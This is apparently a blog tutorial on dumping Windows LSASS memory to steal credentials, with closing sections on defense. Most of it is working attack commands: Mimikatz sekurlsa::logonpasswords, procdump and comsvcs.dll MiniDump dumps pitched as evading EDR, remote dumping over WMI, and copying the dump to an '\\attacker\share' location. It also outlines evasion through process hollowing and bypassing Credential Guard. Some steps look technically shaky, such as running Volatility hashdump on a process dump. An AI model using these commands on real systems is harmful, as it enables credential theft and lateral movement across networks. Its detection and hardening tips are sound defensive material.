Dumping LSASS Memory for Credential Extraction: Techniques and Tools

One of the most crucial steps in post-exploitation and privilege escalation is extracting credentials from the LSASS (Local Security Authority Subsystem Service) process on a Windows system. LSASS stores passwords, hashes, Kerberos tickets, and other sensitive data in memory.

Dumping LSASS memory is a common technique used by attackers to extract these credentials. However, modern Endpoint Detection and Response (EDR) solutions and Windows Defender actively monitor for such activities, making it essential to use advanced techniques and proper evasion methods.

1. What is LSASS?

Keyword: LSASS Memory Dump

LSASS is a process in Windows responsible for enforcing security policies and handling user authentication. The process is crucial as it stores:

• NTLM Hashes
• Kerberos Tickets
• Plaintext Passwords (in some cases)
• Cached Credentials

LSASS Process Location:

C:\Windows\System32\lsass.exe

2. Why Dump LSASS Memory?

Extracting credentials from LSASS can grant an attacker full control over the compromised system and even the entire Active Directory (AD) environment.

Common Attack Scenarios:

• Post-Exploitation: After gaining initial access to escalate privileges.
• Lateral Movement: To pivot to other systems on the network.
• Credential Dumping: To gather domain admin or local admin credentials.

3. Techniques to Dump LSASS Memory

3.1 Dumping via Mimikatz

Keyword: Mimikatz LSASS Dump

Mimikatz is a powerful post-exploitation tool capable of extracting credentials directly from memory.

Download and Execute Mimikatz:

Invoke-WebRequest -Uri "https://example.com/mimikatz.exe" -OutFile "C:\temp\mimikatz.exe"

Dump LSASS Memory with Mimikatz:

privilege::debug
sekurlsa::logonpasswords

Dump LSASS via MiniDump:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

3.2 Creating an LSASS Dump with Task Manager

Step 1: Open Task Manager

• Locate lsass.exe under Processes.
• Right-click and choose Create Dump File.
• The file will be saved at:

C:\Users\<Username>\AppData\Local\Temp\lsass.DMP

Step 2: Transfer the Dump File

Copy the file to your attacking machine:

copy C:\Users\<Username>\AppData\Local\Temp\lsass.DMP \\attacker\share\

Step 3: Analyze the Dump with Mimikatz**

sekurlsa::minidump lsass.DMP
sekurlsa::logonpasswords

3.3 Using Procdump for LSASS Dumping

Keyword: Procdump LSASS Dump

Procdump is a Microsoft Sysinternals tool used for capturing process memory dumps. It is stealthier than Mimikatz as it looks like a legitimate system activity.

Step 1: Download Procdump

Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "C:\temp\Procdump.zip"

Step 2: Extract and Execute

procdump.exe -ma lsass.exe C:\temp\lsass.dmp

Step 3: Analyze the Dump with Mimikatz**

sekurlsa::minidump C:\temp\lsass.dmp
sekurlsa::logonpasswords

3.4 Dumping LSASS Using comsvcs.dll

An alternative method to dump LSASS without using third-party tools:

rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump lsass.exe C:\temp\lsass.dmp full

Advantages:

• Bypasses most EDR detections.
• Uses native Windows DLLs.

3.5 Remote LSASS Dump via WMI and PowerShell

Remote Dump Using WMI:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "procdump.exe -ma lsass.exe C:\temp\lsass.dmp"

Remote File Transfer:

copy-item -path C:\temp\lsass.dmp -destination \\attacker\share\

4. Evasion Techniques and Anti-Detection

Keyword: LSASS Dump Evasion Techniques

4.1 Memory Injection Techniques

• Inject directly into trusted processes to mask malicious actions.
• Avoid spawning suspicious child processes.

4.2 Process Hollowing

Replace the memory space of a legitimate process with a payload, making detection harder.

4.3 Bypassing Credential Guard

Credential Guard is a Windows 10/11 and Server 2016+ feature that isolates LSASS. Use:

• Kernel Exploits: To disable Credential Guard.
• Direct Memory Access (DMA): Via hardware devices.

5. Analyzing LSASS Dump on an Attacker Machine

Transfer the dump to your Kali Linux or Windows analysis machine.

scp user@victim:/temp/lsass.dmp /opt/lsass.dmp

5.1 Using Mimikatz on Kali

mimikatz.exe "sekurlsa::minidump /opt/lsass.dmp" "sekurlsa::logonpasswords"

5.2 Analyzing with Volatility

volatility -f /opt/lsass.dmp --profile=Win10x64_1809 hashdump

6. How to Detect and Prevent LSASS Dumping

Keyword: LSASS Dump Prevention

6.1 Enabling Windows Defender and EDR

• Monitor processes that access lsass.exe.
• Use Advanced Threat Protection (ATP) to detect suspicious memory dumps.

6.2 Hardening LSASS Protection

Enable LSASS Protection Mode:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "RunAsPPL" /t REG_DWORD /d "1" /f

6.3 Implementing Credential Guard

Protect LSASS with Windows Defender Credential Guard to prevent memory dumping.

7. Detection Techniques for Blue Teams

Monitor Common Indicators:

• Event ID 4697: Service installation.
• Event ID 7045: New service creation.
• Event ID 4688: Process creation, especially from suspicious paths.

Use SIEM Solutions like Wazuh:

Set up alerts for unusual processes interacting with lsass.exe.

Conclusion

Dumping LSASS memory is a critical post-exploitation technique used by attackers to extract sensitive credentials from compromised systems. While tools like Mimikatz and Procdump are widely known, modern defense mechanisms demand more advanced and stealthy approaches.

By combining techniques like rundll32-based dumping, memory injection, and credential guard bypass, penetration testers can effectively demonstrate the risk of credential leakage. However, defenders must stay vigilant and implement LSASS hardening techniques to mitigate these risks.